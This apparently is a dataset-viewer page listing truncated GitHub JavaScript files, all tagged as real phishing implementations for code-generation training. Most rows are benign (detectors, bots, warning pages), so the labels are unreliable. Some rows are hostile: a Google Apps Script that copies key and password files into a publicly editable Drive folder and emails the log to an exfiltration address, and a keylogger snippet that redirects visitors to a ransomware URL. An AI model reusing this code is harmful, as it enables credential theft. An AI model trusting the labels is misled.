const { Builder, By, until, Capabilities } = require("selenium-webdriver") const chrome = require("selenium-webdriver/chrome") const url = require("url") const fs = require("fs") const crypto = require("crypto") const request = require("request") const path = require("path") const FormData = require("form-data") const proxy = require("selenium-webdriver/proxy") const proxyChain = require("proxy-chain") require('console-stamp')(console, { format: ':date(yyyy/mm/dd HH:MM:ss.l)' }) require("dotenv").config() const extensionId = "caacbgbklghmpodbdafajbgdnegacfmo" const CRX_URL = `https://clients2.google.com/service/update2/crx?response=redirect&prodversion=98.0.4758.102&acceptformat=crx2,crx3&x=id%3D${extensionId}%26uc&nacl_arch=x86-64` const USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" const USER = process.env.APP_USER || "" const PASSWORD = process.env.APP_PASS || "" const ALLOW_DEBUG = !!process.env.DEBUG?.length || false const EXTENSION_FILENAME = "app.crx" const PROXY = process.env.PROXY || undefined console.log("-> Starting...") console.log("-> User:", USER) console.log("-> Pass:", PASSWORD) console.log("-> Proxy:", PROXY) console.log("-> Debug:", ALLOW_DEBUG) if (!USER || !PASSWORD) { console.error("Please set APP_USER and APP_PASS env variables") process.exit() } if (ALLOW_DEBUG) { console.log( "-> Debugging is enabled! This will generate a screenshot and console logs on error!" ) } async function downloadExtension(extensionId) { const url = CRX_URL.replace(extensionId, extensionId) const headers = { "User-Agent": USER_AGENT } console.log("-> Downloading extension from:", url) // if file exists and modify time is less than 1 day, skip download if (fs.existsSync(EXTENSION_FILENAME) && fs.statSync(EXTENSION_FILENAME).mtime > Date.now() - 86400000) { console.log("-> Extension already downloaded! skip download...") return } return new
Javascript
web3bothub/gradient-bot
2025-05-22T22:01:02.390000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
const SCALES = { URGENCY: 5, CONFRIM: 6 }; const TOTALSCALE = 20; const THRESH = 0.33; function emailCheck(email) { let scale = 0; let idx = email.lastIndexOf("@"); id = email.slice(0, idx); dmn = email.slice(idx + 1); len1 = id.length; len2 = dmn.length; // Check Email ID for Number Count >= 3 idNums = id.replace(/\D/g, ""); if (idNums && idNums.length >= 3) scale += 2; // Check Email Domain for Number Count > 0 dmnNums = dmn.replace(/\D/g, ""); if (dmnNums && dmnNums.length > 0) scale += 2; // Check Email Domain for Common Domain let found = DOMAINS.find(d => d === dmn); if (!found) scale += 1; return scale; } function URLcheck(body) { url = body.match( /[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)/ ); if (url) return 2; return 0; } function greetingCheck(greeting) { let scale = 0; for (i = 0; i < 3; i++) { let found = GREETINGS.find(greet => greeting[i] === greet); if (found) scale += 1; if (scale > 1) return 2; } return scale; } function urgencyCheck(word) { let found = URGENCY_WORDS.find(w => w === word); if (found) return 5 / 3; return 0; } function confirmCheck(word) { let found = CONFIRMING_WORDS.find(w => w === word); if (found) return 2; return 0; } function dictionaryCheck(body) { body = body .replace(/[.,'\/#!$%\^&\*;:{}=\-_`~()]/g, "") .replace(/\r?\n|\r/g, " "); // Remove special chars let words = body.split(" "); words = words.filter(w => Boolean(w)); //Remove falsey values let greeting = words.splice(0, 3); let grtScale = greetingCheck(greeting); let urgScale = 0; let cfmScale = 0; words.forEach(word => { if (urgScale < SCALES.URGENCY) urgScale += urgencyCheck(word); if (cfmScale < SCALES.CONFRIM) cfmScale += confirmCheck(word); }); return { grtScale, urgScale, cfmScale }; } function phishCheck(email, body) { let eScale = emailCheck(email); let urlScale = URLcheck(body); let dictScale = dic
Javascript
PhishersOfMen/Assn5-Phishing-SQLI
2025-05-22T22:01:02.523000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
#!/usr/bin/env node const fs = require('fs'); const debug = require('debug')('fuzz:main'); const Promise = require('bluebird'); const program = require('commander'); const request = require('request'); const libssdeep = require('ssdeep'); const csv = require('csv'); const ProgressBar = require('progress'); const CONF = require('./config'); const { printError, printInfo, printResult, printBanner, parseTarget, bye } = require('./lib/utils'); const { DomainFuzz, DomainDict, DomainThread } = require('./lib'); const fuzz = (opts, domains, worker) => { const total = domains.length; const bar = new ProgressBar('Running [:bar] :percent :etas', { complete: '=', incomplete: ' ', width: 50, total, }); Promise .map(domains, (domain) => { bar.tick(1); return worker.run(domain); }, { concurrency: opts.concurrency }) .then((result) => { if (opts.option_output) { let data; if (opts.option_format === 'JSON') { data = JSON.stringify(result, null, 4); fs.appendFile(opts.option_output, data, 'utf8', (err) => { if (err) printError(err.message); }); } else if (opts.option_format === 'CSV') { data = []; const columns = 'fuzzer,domain-name,dns-a,dns-aaaa,dns-mx,dns-ns,geoip-country,whois-created,whois-updated,ssdeep-score'; data.push(columns.split(',')); for (const domain of result) { data.push(columns.split(',').map(_ => domain[_])); } csv.stringify(data, (parseErr, res) => { fs.appendFile(this.option_output, res, 'utf8', (err) => { if (err) printError(err.message); }); }); } } for (const domain of result) { printResult(domain); } }) .catch(err => printError(err.message)); }; const main = () => { const opts = program .version(CONF.version) .usage('[options] DOMAIN') .description(`Find similar-loo
Javascript
monkeym4ster/DomainFuzz
2025-05-22T22:01:02.651000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
const fs = require("fs"); // load puppeteer const puppeteer = require('puppeteer'); const window_height = 768; const window_width = 1366; const studio_url = "https://studio.youtube.com/"; // directory contains the videos you want to upload const upload_file_directory = "your video directory"; // change user data directory to your directory const chrome_user_data_directory = "C:\\Users\\user\\AppData\\Local\\Chromium\\User Data"; const title_prefix = "video title prefix "; const video_description = ""; const DEFAULT_ARGS = [ '--disable-background-networking', '--enable-features=NetworkService,NetworkServiceInProcess', '--disable-background-timer-throttling', '--disable-backgrounding-occluded-windows', '--disable-breakpad', '--disable-client-side-phishing-detection', '--disable-component-extensions-with-background-pages', '--disable-default-apps', '--disable-dev-shm-usage', '--disable-extensions', // BlinkGenPropertyTrees disabled due to crbug.com/937609 '--disable-features=TranslateUI,BlinkGenPropertyTrees', '--disable-hang-monitor', '--disable-ipc-flooding-protection', '--disable-popup-blocking', '--disable-prompt-on-repost', '--disable-renderer-backgrounding', '--disable-sync', '--force-color-profile=srgb', '--metrics-recording-only', '--no-first-run', '--enable-automation', '--password-store=basic', '--use-mock-keychain', ]; let files = []; fs.readdir(upload_file_directory, function (err, temp_files) { if (err) { console.log('Something went wrong...'); return console.error(err); } for (let i = 0; i < temp_files.length; i++) { files.push(temp_files[i]); } }); try { (async () => { const browser = await puppeteer.launch( { 'headless': false, // have window executablePath: null, userDataDir: chrome_user_data_directory, ignoreDefaultArgs:
Javascript
last2win/youtube-upload-multi-videos
2025-05-22T22:01:02.782000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
import warning from './station.svg' import terra from './terra.svg' import './fonts.css' import './App.css' const SAFE_PAGE = 'https://station.money' function App() { if (!document.referrer || document.referrer === window.location.href) { //window.location.href = SAFE_PAGE } if (document.referrer) { const { hostname } = new URL(document.referrer) if (hostname === 'terra.money' || hostname.endsWith('.terra.money')) { return ( <div className='app__terra'> <img src={terra} alt='Terra logo' /> <h2>WARNING</h2> <p> <span className='url'>{hostname}</span> is currently unavailable. <br /> Please visit{' '} <span className='url'> <a href='https://twitter.com/terra_money'> twitter.com/terra_money </a> </span>{' '} for updates. </p> </div> ) } } return ( <div className='App'> <img src={warning} alt='warning' /> <h2>PHISHING ALERT</h2> <p> You are trying to visit <span className='url'>{document.referrer}</span> <br /> which is a known scam website. </p> <span onClick={() => { window.location.href = SAFE_PAGE }} className='button__main' > Go back to safety </span> {/* <a href={document.referrer} > Visit anyway </a> */} </div> ) } export default App
Javascript
terra-money/scam-alert-web
2025-05-22T22:01:02.912000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
const fs = require('fs') const fsExtra = require('fs-extra') const rmRf = require('rimraf') const Streams = require('mississippi') const bind = require('ap').partial const async = require('./async') const Browserify = require('browserify') const watchify = require('watchify') const sassStream = require('sass-css-stream') start(function(err){ if (err) throw err console.log('end') }) function start(cb){ async.series({ clean, build, }, cb) } function clean(cb){ fsExtra.remove('./dist/', cb) } function build(cb){ async.parallel({ buildJs, buildCss, buildStatic, }, cb) } function buildJs(cb) { var browserify = Browserify({ entries: ['./src/js/index.js'], cache: {}, packageCache: {}, // plugin: [watchify], }) browserify.on('update', bundle) async.series({ buildJsPrep: bind(fsExtra.mkdirs, './dist/js'), buildJsStart: start, }, cb) function start(cb){ var firstBundle = bundle() Streams.finished(firstBundle, cb) } function bundle() { console.log('bundle') return Streams.pipeline( browserify.bundle(), fs.createWriteStream('./dist/js/bundle.js') ) } } function buildCss(cb) { async.series({ buildCssPrep: bind(fsExtra.mkdirs, './dist/css'), buildCssStart: start, }, cb) function start(cb) { var pipeline = Streams.pipeline( fs.createReadStream( './src/css/index.scss' ), sassStream( './src/css/index.scss' ), fs.createWriteStream( './dist/css/bundle.css' ) ) Streams.finished(pipeline, cb) } } function buildStatic(cb) { async.parallel({ imgs: bind(fsExtra.copy, './src/img/', './dist/img/'), faviconAndroid: bind(fsExtra.copy, './src/manifest.json', './dist/manifest.json'), faviconIE: bind(fsExtra.copy, './src/browserconfig.xml', './dist/browserconfig.xml'), fonts: bind(fsExtra.copy, './src/fonts/', './dist/fonts/'), index: bind(fsExtra.copy, './src/index.html'
Javascript
409H/landing
2025-05-22T22:01:03.059000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
// Created by Greg Carson @ Feb 2017 // --------------------------------------- // Play nice and use for security training // and testing. function drivePassSearch() { // This creates a PUBLICALLY AVAILABLE RWX FOLDER in Drive under the executing users context. // This can be disabled for Google Apps for Business users: // https://support.google.com/a/answer/60781?hl=en // Personal users shit out of luck? Not sure haven't looked into it. var folder = DriveApp.createFolder('Evil Folder'); folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT); // Construct malicious search query on drive. Look for PDFs? DOC/XLS files? If you are looking for an extension use 'title contains' // If you want to search through content for a keyword use 'fullText contains' instead // You can construct more complex queries using logical operators, for example: 'and (mimeType contains 'image/' or mimeType contains 'video/')' // Not aware of case sensitivity or ability to perform regular expressions // Search Ideas? title contains .cer .pem .der .crt .pub id_rsa .docx .xlsx .vsd password .nessus ntds.dit // or fullText contains password or any other combination of keywords of interest such as target individuals, target servers, etcetera var files = DriveApp.searchFiles( 'modifiedDate > "2013-02-28" and title contains "SEARCHTERMHERE"'); while (files.hasNext()) { var file = files.next(); Logger.log(file.getDownloadUrl()); Logger.log(file.getUrl()); Logger.log(file.getName()); var name = file.getName(); file.makeCopy(name,folder); Logger.log(file.getDownloadUrl()); Logger.log(file.getUrl()); } // Write Logger data to body of email and send to specified recipient // Sender address is the current active user Logger.log(folder.getUrl()); var recipient = "RECPIENT-EXFIL-EMAIL-ADDRESS-HERE"; var subject = 'Google Drive Query - KDBX'; var body = Logger.getLog(); MailApp.sendEmail(recipient, subj
Javascript
gregkcarson/GoogleAppScriptSE
2025-05-22T22:01:03.220000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
const express = require("express"); const app = express(); const http = require("http"); const server = http.createServer(app); const puppeteer = require('puppeteer'); const port = 9001; var browser; app.use(express.json()) app.post('/bot/url', function(req, res) { res.setHeader('Content-Type', 'application/json'); console.log(req.body); let url = req.body.url console.log(url); startBot(url) .then(() => { res.send({ message: 'success', data: req.body }) }) .catch((err) => { res.send({ message: 'failed', error: err }) }) }) async function startBot(url) { console.log(browser); if(typeof browser !== 'undefined'){ await browser.close() } const minimal_args = [ '--autoplay-policy=user-gesture-required', '--disable-background-networking', '--disable-background-timer-throttling', '--disable-backgrounding-occluded-windows', '--disable-breakpad', '--disable-client-side-phishing-detection', '--disable-component-update', '--disable-default-apps', '--disable-dev-shm-usage', '--disable-domain-reliability', '--disable-extensions', '--disable-features=AudioServiceOutOfProcess', '--disable-hang-monitor', '--disable-ipc-flooding-protection', '--disable-notifications', '--disable-offer-store-unmasked-wallet-cards', '--disable-popup-blocking', '--disable-print-preview', '--disable-prompt-on-repost', '--disable-renderer-backgrounding', '--disable-setuid-sandbox', '--disable-speech-api', '--disable-sync', '--hide-scrollbars', '--ignore-gpu-blacklist', '--metrics-recording-only', '--mute-audio', '--no-default-browser-check', '--no-first-run', '--no-pings', '--no-sandbox', '--no-zygote', '--password-store=basic', '--use-gl=swiftshader', '--use-mock-keychain', ]; console.log("Launching Headless Browser::::::::::::"); browser = await puppeteer.launch({
Javascript
arunjohn96/webndi
2025-05-22T22:01:03.383000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
import React from 'react'; import { Route, Switch } from 'react-router-dom'; const isBrowser = typeof window !== "undefined" && typeof window.document !== "undefined"; const dummy = () => {}; const HelpTextPage = isBrowser? React.lazy(() => import("./components/helpText")): dummy; const WebhookPage = isBrowser? React.lazy(() => import("./pages/guild_dashboard/server_view")): dummy; const ManagerRootPage = isBrowser? React.lazy(() => import("./pages/emote_manager/manager_root")): dummy; const LoginPage = isBrowser? React.lazy(() => import("./pages/login")): dummy; const InvitePage = isBrowser? React.lazy(() => import("./pages/invite")): dummy; const PrivacyPolicy = isBrowser? React.lazy(() => import("./pages/policy")): dummy; const GuildCreatorPage = isBrowser? React.lazy(() => import("./pages/guild_builder/guild_builder")): dummy; const GuildSelectorPage = isBrowser? React.lazy(() => import("./pages/guild_builder/guild_selector")): dummy; const GuildStatusPage = isBrowser? React.lazy(() => import("./pages/guild_builder/guild_status")): dummy; const LicensePage = isBrowser? React.lazy(() => import("./pages/licenses")): dummy; const CommandPage = isBrowser? React.lazy(() => import("./pages/commands")): dummy; const BotAddedPage = isBrowser? React.lazy(() => import("./pages/bot_added")): dummy; const PremiumPage = isBrowser? React.lazy(() => import("./pages/premium")): dummy; const PublicPackSearchPage = isBrowser? React.lazy(() => import("./pages/public_packs/search")): dummy; const PublicPackPage = isBrowser? React.lazy(() => import("./pages/public_packs/view")): dummy; const PhishingPage = isBrowser? React.lazy(() => import("./pages/phishing")): dummy; const TermsPage = isBrowser? React.lazy(() => import("./pages/terms")): dummy; export const FullRouter = ({loggedIn, HomePage}) => { return ( <React.Suspense fallback={<div>Loading Page...</div>}> {!loggedIn && <LoggedOutRouter HomePage={HomePage}/>} {loggedIn && <LoggedInRouter HomePage={H
Javascript
NQN-Discord/NQNFrontend
2025-05-22T22:01:03.529000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
const maxConfigItems = 600 const maxPerType = 300 const includeOriginalConfigs = 0 const subLinks = [ "https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/trojan.txt", "https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/ss.txt", "https://raw.githubusercontent.com/coldwater-10/V2Hub/main/Split/Base64/shadowsocks", "https://raw.githubusercontent.com/coldwater-10/V2Hub2/main/Split/Base64/vmess", "https://raw.githubusercontent.com/NiREvil/vless/main/sub/freedom" ] const cnfLinks = [ "https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/vmess.txt", "https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/vmess_iran.txt", "https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/trojan_iran.txt", "https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/ss_iran.txt" ] const cleanIPLink = "https://raw.githubusercontent.com/coldwater-10/clash_rules/main/List%20of%20clean%20IPs.txt" const operatorList = ["AST", "HWB", "IRC", "MBT", "MCI", "MKB", "PRS", "RTL", "SHT", "ZTL", "PIS", "DAT", "SAB", "ASR", "FAN", "ZTL", "SFR", "DID", "LAY", "MAH", "TAK", "PET", "AND", "RES", "AFR", "ARA", "SAM", "APT", "ALL", "PLUS", "TEST", "ENG", "FA", "IPV6", "IRCF", "ANTY"] const addressList = ["discord.com", "cloudflare.com", "nginx.com", "cdnjs.com", "vimeo.com", "networksolutions.com"] const fpList = ["chrome", "chrome", "chrome", "firefox", "safari", "edge", "ios", "android", "360", "qq", "random", "random"] const alpnList = ["http/1.1", "h2,http/1.1", "h2,http/1.1", "h2,http/1.1"] var cleanIPs = [] export default { async fetch(request) { var url = new URL(request.url) var pathParts = url.pathname.replace(/^\/|\/$/g, "").split("/") var type = pathParts[0].toLowerCase() if (["sub", "clash"].includes(type)) { if (pathParts[1] !== undefined) { var operator = pathParts[1].toUppe
Javascript
NiREvil/workers-cloudflare
2025-05-22T22:01:03.663000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
/* eslint-env node */ module.exports = { test_page: 'tests/index.html?hidepassed', disable_watching: true, launch_in_ci: [ 'Chrome', ], launch_in_dev: [ 'Chrome', ], browser_args: { Chrome: [ '--headless', '--no-sandbox', '--disable-gpu', '--disable-software-rasterizer', '--mute-audio', '--remote-debugging-port=0', '--window-size=1440,900', // https://github.com/GoogleChrome/puppeteer/blob/v1.11.0/lib/Launcher.js#L36 '--disable-background-networking', '--disable-background-timer-throttling', '--disable-backgrounding-occluded-windows', '--disable-breakpad', '--disable-client-side-phishing-detection', '--disable-default-apps', '--disable-dev-shm-usage', '--disable-extensions', '--disable-features=site-per-process', '--disable-hang-monitor', '--disable-ipc-flooding-protection', '--disable-popup-blocking', '--disable-prompt-on-repost', '--disable-renderer-backgrounding', '--disable-sync', '--disable-translate', '--enable-automation', '--metrics-recording-only', '--no-first-run', '--password-store=basic', '--safebrowsing-disable-auto-update', '--use-mock-keychain', ], }, };
Javascript
bitcoin-black-bcb/bcb-wallet
2025-05-22T22:01:03.841000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
//'use strict'; function appendMirr(data) { mirr = JSON.parse(data)[0]; if(mirr.url) { var altelem = document.createElement("h1"); altelem = '<br/><a style="background: #2d2d2d !important; color:yellow !important; text-align: center !important; position: fixed !important; width: 100% !important; line-height: 1.5 !important; z-index: 9999 !important; display: block !important; visibility: visible !important; opacity: 1 !important;" href="'+mirr.url+'">Try this working mirror instead</a>'; var element = document.getElementById('mainwarn'); element.innerHTML += altelem; } } function newMirr(site, success) { if(site) { getAjax('https://onion.live/api/v2/public/mirrors?site='+site+'&max=1', '', success); } } function handleResponse(message) { console.log(`Message from the background script: ${message.response}`); } function handleError(error) { console.log(`Error: ${error}`); } function getAjax(url, data, success) { var params = typeof data == 'string' ? data : Object.keys(data).map( function(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) } ).join('&'); var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP"); xhr.open('GET', url); xhr.onreadystatechange = function() { if (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); } if (xhr.readyState>3 && xhr.status!==200) { success(xhr.responseText); } }; xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(params); return xhr; } function checkWorking(url, site) { var MrChecker = new XMLHttpRequest(), CheckThisUrl = "http://"+url+"/"; MrChecker.open('get', CheckThisUrl, true); MrChecker.onreadystatechange = checkReadyState; function checkReadyState() { if (MrChecker.readyState === 4) { if (MrChecker.status >= 200 || MrChecker.status < 304) { var element = document.getElementById('mainwarn'); if(element) {
Javascript
OnionDotLive/onionliveplugin
2025-05-22T22:01:04.017000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
/* #################################################################### # s'abonner sur ma chaine youtube pour avoir plus de code phishing # # et hacking,il me donne le courage de faire les codes phishing # # # # subscribe on my youtube channel to have more phishing code # # and hacking, it gives me the courage to do the phishing codes # # # # ||~~ BY ~~ hakanonymos ~~|| # # # # # # # # skype et email : hakanonymos@hotmail.com # #################################################################### */ var xScroll, yScroll, timerPoll, timerRedirect, timerClock; function initRedirect(){ if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz xScroll = document.body.scrollLeft; yScroll = document.body.scrollTop; clearInterval(timerPoll); //stop polling scroll move clearInterval(timerRedirect); //stop timed redirect timerPoll = setInterval("pollActivity()",1); //poll scrolling votre site de redrection 10000 = 10 seconde timerRedirect = setInterval("location.href='https://panafricaine.com/ransomware/'",300 0000); //temps de redirection } else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
Javascript
hakanonymos/chromeKeylogger
2025-05-22T22:01:04.152000
training
code_generation
phishing in Javascript
Real implementation of phishing in Javascript fetched from GitHub.
import { useEffect, useState } from "react"; import Navbar from "./components/Navbar/Navbar"; import Breadcrumbs from "./components/Breadcrumbs/Breadcrumbs"; import ProductDetails from "./components/ProductDetails/ProductDetails"; import ProductCarousel from "./components/ProductCarousel/ProductCarousel"; import Swal from "sweetalert2"; import "./App.css"; const App = () => { const [darkMode, setDarkMode] = useState(false); const toggleDarkMode = () => setDarkMode(prevState => !prevState); useEffect(() => { Swal.fire({ title: "¡Atención!", text: "Esta web NO es el sitio oficial de Mercado Libre, se trata de un challenge de Frontend, no es un intento de phishing hacia los usuarios que la visitan.", icon: "warning", confirmButtonText: "¡Entendido!", confirmButtonColor: "#3484fa", backdrop: "rgba(0, 0, 0, 0.8)", }); }, []); return ( <> <header className={darkMode ? "dark-mode" : ""}> <Navbar darkMode={darkMode} toggleDarkMode={toggleDarkMode} /> </header> <main className={darkMode ? "dark-mode" : ""}> <Breadcrumbs /> <ProductDetails /> <ProductCarousel /> </main> <footer className={darkMode ? "dark-mode" : ""}> Desarrollado por&nbsp; <a href="https://gastonperez.ar/" target="_blank" rel="noreferrer" > Gast&oacute;n P&eacute;rez </a> <p> ATENCIÓN: Esta web se trata de un&nbsp; <a href="https://github.com/goncy/mercadolibre-details-challenge" target="_blank" rel="noreferrer" > challenge </a> , no es un intento de phishing hacia los usuarios que la visitan. </p> </footer> </> ); }; export default App;
Javascript
GastonPerez97/mercadolibre-details-challenge
2025-05-22T22:01:04.271000
training
null
null
null
null
null
null
20250522_220104
null
README.md exists but content is empty.
Downloads last month
19